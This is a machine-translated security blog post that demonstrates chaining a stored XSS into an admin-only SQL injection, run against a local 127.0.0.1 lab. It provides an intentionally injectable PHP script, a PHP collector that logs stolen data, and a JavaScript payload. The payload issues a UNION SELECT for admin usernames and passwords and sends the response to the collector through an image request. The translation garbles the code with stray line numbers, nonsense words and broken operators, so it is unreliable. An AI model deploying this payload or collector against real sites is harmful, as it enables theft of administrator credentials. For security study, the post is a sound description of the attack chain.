Yesterday saw the Phpcms v9.1.15 explosion of XSS and no access to SQL injection, so I want to test the use of XSS to execute SQL injection, although the explosion of this phpcms loophole there are many other uses! However, this injection I did not find Phpcms v9.1.15 test, the other version did not test success!
So I have to assume the next extreme environment:
1. Front desk has and only one XSS vulnerability (cannot get administrator cookie)
2. There is only one SQL injection vulnerability in the background (only administrators can access the injected vulnerability file)
3. Inject get admin password to decrypt
4. In addition to the above, no other loopholes (including background Getwebshell)
In fact, I just want to say that we can only use this XSS execution injection!
Simulate injection Vulnerability Code
- sqli.php
<?php
@error_reporting (E_all & ~e_notice & ~e_warning);//Error ignored
$con = mysql_connect ("localhost", "root", "");
if (! $con) {die (' could not connect: '. Mysql_error ());}
mysql_select_db ("Test", $con);
$id = $_get[' XSS '];
$sql = "Select Id,realname from Test where id=". $id ";
$view = mysql_query ($sql);
$row = Mysql_fetch_array ($view);
echo $row [id]. " <br/> ";
echo $row [realname]. " <br/> ";
?>
- MySQL database:
1 database:test
2 table:test, admin
3 Column:test.id, Test.realname
4 Admin.id, Admin.username, Admin.password
- get.php (capture of injected data)
1 <?php
2 $file = fopen ("Data.txt", "a");
3 fwrite ($file, $_get[' get ']);
4 fclose ($file);
5?>
- Xsssqli.js (payload)
The-function addloadevent (func)//window opens load multiple functions
02 {
var oldfunc=window.onload; Page Open is the Load method
if (typeof (Window.onload)!= "function")
05 {
Window.onload=func;
07}
Or else
09 {
Ten window.onload=function ()
11 {
Oldfunc ();
Func ();
14}
15}
16}
function Get_xsssqli ()
18 {
var url = "Http://127.0.0.1/xss/sqli.php?xss=1%20and%201=2%20union%20select%20username,password%20from%20admin" ;
var ajax = null;
The If (window. XMLHttpRequest)
22 {
The Ajax = new XMLHttpRequest ();
24}
or else if window. ActiveXObject)
26 {
Ajax = new ActiveXObject ("Microsoft.XMLHTTP");//ie6 and the old version.
28}
Else
30 {
return;
32}
Ajax.open ("Get", url, True);
Ajax.send (NULL);
Ajax.onreadystatechange = function ()
36 {
Panax Notoginseng if (ajax.readystate = 4 && ajax.status = 200)
38 {
var img = document.createelement ("img");
IMG.SRC = "http://127.0.0.1/xss/get.php?get=" +ajax.responsetext;
Document.body.appendChild (IMG);
42}
43}
44}
Addloadevent (GET_XSSSQLI);
- Simulating XSS vulnerabilities
1 2 3 <title>use XSS to Sqli</title>
4 5 <body>
6 <script src=http://127.0.0.1/xss/get.js ></script>
7 </body>
8
Finally the data was successfully obtained:
Of course, you can also write a regular intercept the specified data! From: http://superman.php100.com/